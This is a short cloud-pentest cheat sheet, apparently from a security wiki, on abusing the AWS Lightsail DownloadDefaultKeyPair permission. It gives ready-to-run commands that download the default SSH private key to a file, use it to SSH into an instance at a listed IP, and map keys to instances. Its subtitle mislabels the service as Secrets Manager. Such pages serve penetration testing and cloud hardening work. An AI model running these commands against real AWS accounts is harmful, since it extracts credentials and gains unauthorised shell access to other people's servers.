Lightsail - PrivEsc

Abusable AWS Secrets Manager permissions that can lead to compromise or privilege escalation

lightsail:DownloadDefaultKeyPair

  • With this action available, you can download the default SSH key pair used by EC2 instances spun up in Lightsail

# download key to a .pem file
aws lightsail download-default-key-pair --query privateKeyBase64 --output text > lightsail.pem

# change permissions 
chmod 400 lightsail.pem

# ssh 
ssh -i lightsail.pem ec2-user@3.91.3.46
  • To know which SSH key is being used for which instance, run

# lightsail:GetInstances
aws lightsail get-instances --query 'instances[].sshKeyName' --output text
 
# lightsail:GetInstance
aws lightsail get-instance --instance-name instance-1 --query 'instance.sshKeyName'

Last updated